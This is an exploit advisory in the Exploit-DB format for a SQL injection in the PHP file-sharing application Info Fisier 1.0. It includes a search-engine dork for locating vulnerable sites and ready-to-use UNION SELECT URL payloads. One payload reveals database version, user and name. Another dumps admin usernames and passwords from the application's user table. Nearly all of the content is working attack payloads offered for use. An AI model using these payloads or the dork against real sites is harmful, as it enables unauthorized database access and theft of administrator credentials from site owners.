Info Fisier 1.0 - SQL Injection

EDB-ID:

10726

CVE:

N/A


Platform:

PHP

Published:

2009-12-27

====================================================================================
[+]  Info Fisier 1.0  SQL Injection Vulnerability  

[+]  Software : Info Fisier 1.0
[+]  Author   : AnGrY BoY
[+]  Contact  : h4kurd@hotmail.com & h4kurd@yahoo.com
[+]  Home     : http://www.kurd-security.com    http://www.h4kurd.com
=====================================================================================


[+] Dork     : Powered by Info Fisier


[+] expolit:

[+] http://server/upload/file.php?id=[sql]

[+] http://server/upload/file.php?id=-54/**/union/**/select/**/1,concat(version(),0x3e,user(),0x3e,database()),3,4,5,6,7,8,9,10,11--

[+] http://server/file.php?id=-670/**/union/**/select/**/1,group_concat(admin,0x3e,pass),3,4,5,6,7,8,9,10,11/**/from+djsefu_useri--
                            

======================================================================================
[+]Special Thanks:- Hangaw_hawlery & FormatXformaT   and all kurd-security members